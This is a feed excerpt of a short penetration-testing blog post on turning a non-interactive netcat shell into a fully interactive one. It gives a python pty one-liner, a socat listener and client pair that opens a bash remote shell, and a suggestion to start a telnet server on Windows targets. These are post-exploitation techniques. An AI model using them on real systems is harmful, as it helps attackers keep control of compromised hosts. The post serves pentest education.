TelnetD – GoSecure! https://www.gosecure.it/blog MyDear(root)Shell Mon, 20 Jan 2014 15:03:00 +0000 en-US hourly 1 https://wordpress.org/?v=5.6 From a non interactive shell to an interactive one https://www.gosecure.it/blog/art/118/note/from-a-non-interactive-shell-to-an-interactive-one/ https://www.gosecure.it/blog/art/118/note/from-a-non-interactive-shell-to-an-interactive-one/#respond Tue, 18 Jun 2013 10:08:59 +0000 https://www.gosecure.it/blog/?p=118 read more)]]> As you can read at the end of this post a remote shell using command execution (-e cmd.exe or /bin/bash) isn’t a full interactive command prompt.
These are solutions I found to have a more stable shell. Note that I don’t talk about a web remote shell as c99, c100, weevely or other php/asp code that need a web server. Also I don’t want to talk about MSFvenom and similar, but I focused on something similar to NC or SSH.

The target is a Linux system.
Using Pyton:
After you get a Netcat remote shell execute

python -c 'import pty; pty.spawn("/bin/bash");'

This is non completly interactive, but is better than before.

Is Better to use socat that is a more complex variant of netcat.
Listener:

socat file:`tty`,raw,echo=0 tcp-listen:8999

Client:

socat tcp:127.0.0.1:8999 exec:"bash -li",pty,stderr,setsid,sigint,sane

This is a full interactive remote shell

The target is a Windows system.
I suppose that in Microsoft environment you don’t have pyton or socat, although the two programs have Windows binary.
So the better way I found is to start a telnet server. Googling I found some stand alone programs like TelnetD. Note that isn’t a free software, but you can try it using the Trial Version.

]]> https://www.gosecure.it/blog/art/118/note/from-a-non-interactive-shell-to-an-interactive-one/feed/ 0